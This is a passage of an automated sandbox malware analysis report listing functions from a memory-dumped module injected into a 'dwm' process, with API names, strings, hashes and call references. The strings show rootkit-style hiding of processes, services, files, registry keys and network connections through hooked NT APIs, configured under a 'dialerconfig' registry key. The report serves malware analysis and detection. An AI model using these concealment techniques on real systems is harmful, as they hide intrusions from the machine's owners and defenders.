                                                                                • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                                Execution Graph

                                                                                Execution Coverage: 1.7%
                                                                                Dynamic/Decrypted Code Coverage: 95.6%
                                                                                Signature Coverage: 0%
                                                                                Total number of Nodes: 135
                                                                                Total number of Limit Nodes: 16

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 2969c2283baf436b52471c0dd72c5a34752808bbaf6e92cb8698fb307b17855c
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: CA71F67A610F1089EB149F79E8906DD2368F788F88F501191AE4E57B6EEF36C445E340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 532fa79624950b1881f1283b20fa38b53297972ce140c533428026739ab091ad
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: BD112A3A704B4186EB189B25E4046E963B4F748B86F5401A9EF8907768EF2EC545D704

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction ID: 2c08d144f7439132435d16453bda7c7501d22123e30e0c45c2987ea6ccbbd8ff
                                                                                • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                                • Instruction Fuzzy Hash: F2D18876208F8881DA749B1AE4943DAB7A0F78CF88F140196EB8D47BA9DF3DC545DB40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction ID: f1417c386a04ed11b26314ad22a1bed10d830863f456b4636a77e565cc498eca
                                                                                • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                                • Instruction Fuzzy Hash: DC02BA72219B8486EB64CB55E49039AB7A0F3C8B94F104195FB8E87BADDF7DC484DB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction ID: 76c4d106e3fedf68f3b540c6929bc792785fe06e2531eb5b009f972fab3b7692
                                                                                • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                • Instruction Fuzzy Hash: 3E31F032219F9481EA789A15E0553DE66E0F38CB84F5015A5F7CE47BACEF7EC580AB04

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 2ac1fde5ceca8f5e5ba180acfd043857f4f33f0c7581980f357d40f5372f6f43
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: 0B118471A14F4086FB6C9721F849BEA22D4AB5CB45F6041E4BB06836BDFF7BC444E600

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction ID: 257107c6a131fa6ae524c71ac86d974b387ea6ef410a9d0da3cecff434d44bdf
                                                                                • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction Fuzzy Hash: A8F0A476218F0480D6289B45E4517DAABA0E38CBD4F145195FA8D47B6DDF3AC6909B40

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 3902f09aa2da9d38923e8f1cf7cc37bf8468d54b6c15079d0d07c7b5da615e92
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 7661E132B01B9087EB588F1594807EDB3A2FB58BA4F588135EF9D07788DB79D852E701

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001160CBE1628: GetProcessHeap.KERNEL32 ref: 000001160CBE1633
                                                                                  • Part of subcall function 000001160CBE1628: HeapAlloc.KERNEL32 ref: 000001160CBE1642
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE16B2
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE16DF
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE16F9
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1719
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE1734
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1754
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE176F
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE178F
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE17AA
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE17CA
                                                                                • Sleep.KERNEL32 ref: 000001160CBE1AD7
                                                                                • SleepEx.KERNELBASE ref: 000001160CBE1ADD
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE17E5
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1805
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE1820
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1840
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE185B
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE187B
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE1896
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE18A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 4d05f47bd48a93094164b4b7e942f50d2a5613aedc5ce409dc6bb53def4e775c
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: B131BA71601F4141FB58AB7ADA412ED23A5AB4CFC4F2454E1AF098B6AFFF36C851E210

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: c707166a0a917046ebf7e864e7a4e84195229765a0eaebd405d71a458f135471
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: BDB15976210F6086EB6C8F25D4407E963A9F748F84F549096FF0953B98EB76CC40E341
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: d24682c49f3cba86a42b6dd37d32561b84aec9e9ec0b9faacc2435d91fa56541
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 2B318176205F808AEB64DF64E8807EE7364F788B44F44406AEB4E57B98EF39C649D710
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 7aee568606479a74cb3337d4d952b70ed198d4533eb6cf8013ee66e46d93c2e5
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: E8315B36214F808AEB648F29E8403DE73A0F789B54F5001A6FB9D43B98EF79C556CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 5f70c4fa48b0520805612a64c9f863e6a41a39741125622862ed31b17deb92bb
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 02514976240F848AEB58CF66E4483DA77A1F788F89F144164EF4A07759EF3AC14ADB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 5a8c6f9e0e0a0ca570b123c31ed6b425557668f1b520d46c7c4e0651d0e9f3d8
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: D33195B8540F4AA4FE0DEFA9E8557D46324B70CB44F9050D3F6094266EEF7A824EE391

                                                                                Control-flow Graph

                                                                                Control-flow Graph: function at 1160cbb6910 (references __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c); rendered graph edge list and executed/not-executed legend not reproduced.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 9f0ed69cfe1bf671b7887ee88bd02b42f551630c69fb0bbdfeeb5c4c92742149
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: C881D131600F0186FB6CAB6594C13D963A0EB8D780F5484A5BB498779EEFBBCC45B710

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001160CBECE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECEBC
                                                                                • SetLastError.KERNEL32 ref: 000001160CBECED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001160CBEECCC,?,?,?,?,000001160CBEBF9F,?,?,?,?,?,000001160CBE7AB0), ref: 000001160CBECF2C
                                                                                  • Part of subcall function 000001160CBED6CC: HeapAlloc.KERNEL32 ref: 000001160CBED721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF54
                                                                                  • Part of subcall function 000001160CBED744: HeapFree.KERNEL32 ref: 000001160CBED75A
                                                                                  • Part of subcall function 000001160CBED744: GetLastError.KERNEL32 ref: 000001160CBED764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 270f405e5c34fdd1e798ad4c0d4d417a63158c46344a50caa6079db8c82e2f10
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 1A416D70201B4446FA6CA77195513F966825B9CFB4F2847E4BB36066EEFF2B9841B200
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 203282c07502a21eae00c1374ca36f7610a09297222327690334813e59da226b
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 6421387A614B4086FB288B25E4487DA67A4F789BA4F600255FB5902BA8DF3DC14ADB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: bb8e69615e03b31d6a737a608a43597c408f3e8ca5254f0f8d71d187ae6dbc85
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: BDE19872A04B808AEB689F65D4C03DD77B4F789B88F100156FF8957B9ACBB6D091E700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 6bc3ea82e8a8577f5158a409ef7d5aa9ea2377159b5f4a00c64b7a5545bf4ddc
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 40E18D72A04B808AEB28DF65D4803DD7BA4F759F98F100196FF8957B99EB35C485E700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: a399a4a14c3a9ace11e47a6ded76f059a603b02c76fd1e926996d450102628d7
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 4141C472311F0045FA1ECBA6A8007E563A5B74DFA0F1941A5BF0A8778DFF3AC546A304
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 862c031dbf3a4e5d40b547c13d930746b696f540b51dc2ef6ec12241561ce9ef
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 76413676254F848AE764CF25E4447DE77A1F388B98F148169EB8907B58EF39C589CB00
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: d4f570e5741af3305a589a5d584869b16596f25287cc0625df4202b5dceca7f7
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: 78119370700B4446FA6CA77595513F962455B4CBF0F2843E4BB3A466DEFFABC802B200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 807ee3d9a8e09dcff49c28744cb6e6743e67fc826685864635c3d8321f605f19
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: C081C171610F018AFA5CAB6AA4413D963D0AB5DF84F1484D5FB05A779EFF3BC846A700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
